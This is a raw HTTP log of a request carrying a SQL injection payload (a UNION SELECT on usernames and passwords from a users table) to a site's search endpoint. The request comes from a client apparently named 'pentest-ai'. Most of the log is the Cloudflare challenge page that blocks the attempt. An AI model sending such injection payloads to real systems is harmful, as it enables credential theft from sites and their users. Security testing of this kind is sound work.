REQUEST:
GET https://my.myfirst.tech/search?id=-1%20UNION%20SELECT%20username%2Cpassword%2C3%20FROM%20users--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9438
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8473c8d52a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Eqf%2BGrTczW6QcnHuVD6K2yr2gp3qCEFfJN09EF2ofkFewIkiubreX3bT%2FVEvTqZ%2FrE6ziyZkA9ldIQpcFccw6mzS8nXs3ZdEvEDzXcttzsQQN7nK5fz4ZEcpXBIDvCF%2Fuw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8473c8d52a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'iXy.hDlIYuxvqRve56s8dA6fvF9Tt_ZKwWR5MIVcWvU-1784281154-1.2.1.1-zFN7XTBLvfaEY_VVg9U6jD3mwC7.WjHkauL4zLtuVn53Umj4x_U3l7cv5Y3UNi8x',cITimeS: '1784281154',cRay: 'a1c8473c8d52a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=-1+UNION+SELECT+username%2Cpassword%2C3+FROM+users--\u0026__cf_chl_tk=OjGvdqnYHFZMSpf.kSSc06GKaUKq2W1.McF31DVeA5k-1784281154-1.0.1.1-BYUN1x5O9FfBEWCo1q8_TX2X6X49.rYqx.A6jviREoA",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=-1+UNION+SELECT+username%2Cpassword%2C3+FROM+users--\u0026__cf_chl_f_tk=OjGvdqnYHFZMSpf.kSSc06GKaUKq2W1.McF31DVeA5k-1784281154-1.0.1.1-BYUN1x5O9FfBEWCo1q8_TX2X6X49.rYqx.A6jviREoA",md: '2P6hhMeUxOdD2roVYXIjb5C.JiYgyh3.DCNc._5l9ko-1784281154-1.2.1.1-zLyrDDDtDz5KUeAeDS5j0Lw6eCQiSfVNIDEjmMTWfwYxL3MYtFD89y0HdtAmdIKGfw8th6DqvSc2Lo8AyR52Dgd4zUCd8rzVHOtZ2JsxSDdF_n6mZ3y1O7ESvXFJLpJRxeejcxMA4IuXRy5FAzEJo30Mex_6mzIjqRmPxbIB_QwbEyTaWcycgLlDmN.GSFgVnn4IvoMZuFXAvesqucjIbTT50jVbiVhyRFKSJ6vaud2XjjojscdfD4r3Du6ArPjesmUj49e1iZ.kI_0_bzDkFUzbd8V0Olp0k4KVKWUzAAA._4A2xQBysITp1ZvCkO2lJUa2VvJ5wxF248H3eBR8mloEBg5KDYiDocb7kBAmIWMqLCyNanRXrW82pjSUCF__dbLTbY9o8eK9AXvQKZ5kTd_K7T1aZ9nLDdKHtzUh4q_DG6OycP4MD.Tlk2s8gBMt2u2LVlYTPEb7cVREFWD55pYWetYc4qMZtgTLu.PirSB3SY7yWol3sh4p9FgrDqvFxnMvT9h6TSVdcdIf8CSkMQPt2X1LukgQJa7K7BkYxcBpQvjSsY5wigVjNk5oN__Fb.qUfGXqzwiMwKEN9nEvkQpapthd_UZYxQqr74Hu4xvmKe2oRMMQR48L1acSXhY4fBwnSiWbC66wcE.Q14JDH7EKmEVnf.EBgJqXona6wVjjhhOiPCP4NQG_cTyld2l3B8FcAzxjKFcOpgz5HQX5iN0lMsbEzYjzumHabQUpjiI7BdQ5VeZvwrxXBsGL2T9q0Cycj7IZKsBUxe7.Qtgoc0y9kTGTAtSyDXqkNYlbPLx66x1ewv9tSndaQS.LSc1xm5cjRbVhL5BmnYX1Xa3yJ3pN4Yi.JwTAl1JrRyNrcNHzwW.SDxHw5kObHWqK3Jmw9bydc5o0.u.VRiB9_8LV6fUuzAo8Fa01r7_6UB0bYuNU4Rmps57yKMqaggSQN2ncPQUnoDE4LVKZK7Aq3xC16iLfSrROfe.ffryQ44FvYLVxVTG0iIEYmxIGn7pEuncctH5PV6KmU.RbSIBYKLcAWegpymOmaN3MsdUGzRoicMT9Arj1BvxZav1nYd81UUUiawKHsSckeDZvFx.tfPcSUcQYrQFVl2Mz2_M6IGiJJC7Nn4y2.PrHv1_MTU9Nr_A2lniS2f2oPYHzJmtKFWX3_7.Eo8zqyZcOiCTXxOXfWIIBzK_mP48YzjhYWfDCVDIrGrDl1569bb1VK1BGGllikA',mdrd: 'MMrJU2baSyJs2axT4DmZMJVpZhf4_d7Kh9JbEfK1TYk-1784281154-1.2.1.1-BHyLsyHtpq11pH9hUOFQlj6kvojjO7m1p_72NI4uJ89JetKYyTpu.XwVqzUxdvso9sy41jF3VLbOik24HO33Vu1chiTpdeZN5xKz6Pu3vsBmnDZY0afTfq5Gkh6hBTL4kJN3jMmSnUghi4vczqy5O0smMhgShfvlxZHM8gFUEk1iXbWn52GneIrC6ecPYo33o9n2.5U223oE8AAmqTKezesIJ6zUN3BMok6_FCXSH7uYvAVhNkctvRA6wLXy7zss',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8473c8d52a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=-1+UNION+SELECT+username%2Cpassword%2C3+FROM+users--\u0026__cf_chl_rt_tk=OjGvdqnYHFZMSpf.kSSc06GKaUKq2W1.McF31DVeA5k-1784281154-1.0.1.1-BYUN1x5O9FfBEWCo1q8_TX2X6X49.rYqx.A6jviREoA"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
